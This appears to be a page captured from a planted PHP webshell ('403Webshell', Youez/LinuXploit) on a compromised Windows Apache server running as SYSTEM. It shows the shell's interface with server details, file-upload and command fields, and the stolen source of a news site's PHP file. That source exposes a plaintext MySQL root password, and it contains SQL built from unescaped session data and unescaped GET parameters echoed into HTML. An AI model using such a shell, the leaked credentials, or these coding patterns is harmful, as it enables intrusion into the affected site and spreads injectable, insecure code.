403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/news/cooprat/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/news/cooprat/news_front.php
<?php 
session_start();
include("db.php"); 
if(!isset($_SESSION['username'])){
}else{ 
$username1 = $_SESSION['username'];
$user1 = $mysqli->query("SELECT * FROM users WHERE username='$username1' LIMIT 1");
$userrow1 = mysqli_fetch_array($user1);
} 

$sitesettings = $mysqli->query("SELECT * FROM settings WHERE id='1'");
$settingsrow = mysqli_fetch_array($sitesettings);

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
	<div align="center">
	  <?php
	$school=$mysqli->escape_string($_GET['school']);
	$limit =$mysqli->escape_string($_GET['limit']);
	$col =$mysqli->escape_string($_GET['col']);
	$thum_width=$mysqli->escape_string($_GET['thum_width']);
	$thum_hight=$mysqli->escape_string($_GET['thum_hight']);
	$objConnect = mysql_connect("localhost","root","sesao8@2558") or die("Error Connect to Database");
	$objDB = mysql_select_db("db_move");
	mysql_query("SET NAMES UTF8");
	$strSQL = "SELECT * FROM posts where cat_id='$school' ORDER BY id DESC LIMIT $limit";
	$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");
	echo"<table border=\"0\"  cellspacing=\"1\" cellpadding=\"1\"><tr>";	
	$intRows = 0;
	while($objResult = mysql_fetch_array($objQuery))
	{
	$intRows++;
	echo "<td>";									
	?>
<table width="<?php echo $thum_width;?>" border="0" cellpadding="0">
  <tr>
    <td width="<?php echo $thum_width;?>" height="<?php echo $thum_hight;?>"><a href="http://125.26.161.137/news/cooprat/story-<?php echo $objResult["id"];?>.php" target="_blank">
	<?php 

	if ($objResult["id"] > 4430){
	?>
	<img src="uploads/<?php echo $objResult["image"];?>" width="<?php echo $thum_width;?>" height="<?php echo $thum_hight;?>" border="1" alt="<?php echo $objResult["title"];?>">
	<?php }else{ ?>
	<img src="<?php echo $objResult["image"];?>" width="<?php echo $thum_width;?>" height="<?php echo $thum_hight;?>" border="1" alt="<?php echo $objResult["title"];?>">
	<?php } ?>		
	</a></td>
  </tr>
  <tr>
  <?php 
  $ti_news = substr("$objResult[title]", 0,230);
  ?>
    <td height="50" valign="top" bgcolor="#0099FF"><font size="2" color="#FFFFFF"><?php echo $ti_news;?>
<?php
$today=date("d-m-Y");
$date_news=$objResult['date'];
$rest2 = substr("$date_news", 0,-9);
$news_day=(strtotime($today)-strtotime($rest2))/(60*60*24);
if($news_day <= 3) { echo "<img src='images/update_news.gif'>";} else { echo "";}
?></font></td>
  </tr>
</table>
	
	    <?php
		echo"</td>";
		if(($intRows)%$col==0)
		{
		echo"</tr>";
		}
		else
		{
		echo "<td>";
		}	
	}
	echo"</tr></table>";
echo "
<table width='100%' border='0'>
  <tr>
    <td align='right'><a href='category-$school-1.php' target='_blank'><img src='images/more_r.png' border='0'></a></td>
  </tr>
</table>
";	
	?>
	    <?php
	mysql_close($objConnect);
	?>	
 
  </div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit